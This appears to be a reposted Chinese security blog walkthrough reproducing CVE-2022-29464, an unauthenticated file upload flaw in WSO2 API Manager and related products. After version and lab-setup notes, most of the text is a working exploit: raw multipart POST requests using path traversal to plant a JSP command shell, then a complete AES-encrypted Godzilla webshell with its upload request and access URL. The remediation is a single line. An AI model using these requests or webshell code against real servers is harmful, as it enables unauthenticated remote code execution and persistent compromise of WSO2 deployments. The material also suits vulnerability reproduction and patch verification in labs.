WSO2（CVE-2022-29464）文件上传漏洞复现

admin

139547
文章

114
评论

2022年6月11日01:29:21评论512 views字数 7859阅读26分11秒阅读模式

点击上方“蓝字”，发现更多精彩。

0x00 漏洞概述

WSO2文件上传漏洞（CVE-2022-29464）是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传，允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

0x01 漏洞影响版本

WSO2 API Manager 2.2.0 及更高版本到 4.0.0
WSO2 Identity Server 5.2.0 及以上至 5.11.0
WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0
WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0
WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0

0x02 漏洞环境搭建

一、利用Ubuntu搭建漏洞环境

1. 安装Java11

sudo apt install openjdk-11-jdkvim  ~/.bashrc--------------------export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64export JRE_HOME=${JAVA_HOME}/jreexport CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/libexport PATH=${JAVA_HOME}/bin:$PATH------------------------

WSO2（CVE-2022-29464）文件上传漏洞复现

2. Ubuntu使用ifconfig命令，需要先执行sudo apt-get install net- tools，下载net-tools。

3. 下载安装包

https://github.com/wso2/product-apim/releases/tag/v4.0.0

WSO2（CVE-2022-29464）文件上传漏洞复现

4.本地下载，上传到ubuntu，解压

unzip wso2am-4.0.0

5. 开启服务

cd /wso2am-4.0.0/bin => ./api-mamager.sh

WSO2（CVE-2022-29464）文件上传漏洞复现

6. 本地访问，用户名及密码：admin：admin

https://your-ip/carbon

WSO2（CVE-2022-29464）文件上传漏洞复现

二、在线靶场

vulfocus在线靶场，CVE-2022-29464

https://vulfocus.cn

WSO2（CVE-2022-29464）文件上传漏洞复现

0x03 漏洞复现

1. 访问WSO2 Web页面，需要注意的是使用https请求

https://123.58.236.76:33185/carbon/admin/login.jsp

WSO2（CVE-2022-29464）文件上传漏洞复现

2. 访问Web页面使用Burp抓包，修改为如下Payload，上传任意命令执行脚本

POST /fileupload/toolsAny  HTTP/1.1Host: 123.58.236.76:51879User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Encoding: gzip, deflateContent-Length: 901Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"
<FORM>    <INPUT name='cmd' type=text>    <INPUT type=submit value='Run'></FORM><%@ page import="java.io.*" %>    <%    String cmd = request.getParameter("cmd");    String output = "";    if(cmd != null) {        String s = null;        try {            Process p = Runtime.getRuntime().exec(cmd,null,null);            BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream()));            while((s = sI.readLine()) != null) { output += s+"</br>"; }        }  catch(IOException e) {   e.printStackTrace();   }    }%>        <pre><%=output %></pre>--4ef9f369a86bfaadf5ec3177278d49c0--

文件上传成功：

WSO2（CVE-2022-29464）文件上传漏洞复现

3. 访问如下页面

https://123.58.236.76:33185/authenticationendpoint/shell.jsp

任意命令执行：

WSO2（CVE-2022-29464）文件上传漏洞复现

0x04 上传WebShell

1. 利用哥斯拉生成的木马，加密方式见webshell链接

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>

2. 构造数据包，发送

WSO2（CVE-2022-29464）文件上传漏洞复现

POST /fileupload/toolsAny  HTTP/1.1Host: 192.168.110.130:9443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Encoding: gzip, deflateContent-Length: 2909Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp"
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>--4ef9f369a86bfaadf5ec3177278d49c0--

3. 访问webshell地址

https://192.168.110.130:9443/authenticationendpoint/shell.jsp

WSO2（CVE-2022-29464）文件上传漏洞复现

4. 哥斯拉连接，Getshell

WSO2（CVE-2022-29464）文件上传漏洞复现

5. 查看上传的木马文件

find  / -name "shell.jsp"

WSO2（CVE-2022-29464）文件上传漏洞复现

0x05 漏洞修复

建议更新到最新版本。

内容仅供学习及自我检测修复，根据此文造成的任何后果均由用户个人承担。

我知道你在看哦

原文始发于微信公众号（米瑞尔信息安全）：WSO2（CVE-2022-29464）文件上传漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

WSO2（CVE-2022-29464）文件上传漏洞复现

0x00 漏洞概述

0x01 漏洞影响版本

0x02 漏洞环境搭建

0x03 漏洞复现

0x04 上传WebShell

0x05 漏洞修复

Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

DataEase H2 JDBC远程代码执行漏洞CVE-2025-32966

金盘移动图书馆系统信息泄露漏洞

Netgear信息泄露漏洞

JeeWMS cgAutoListController.do SQL注入漏洞

泛微E-Cology9前台SQL注入漏洞

OpenSourceMatters Joomla 未授权SQL注入漏洞

某代理商管理系统存在RCE漏洞

OFCMS 1.1.2 存在任意文件写入漏洞

JeeWMS iconController.do 任意文件上传漏洞

发表评论

在线咨询

微信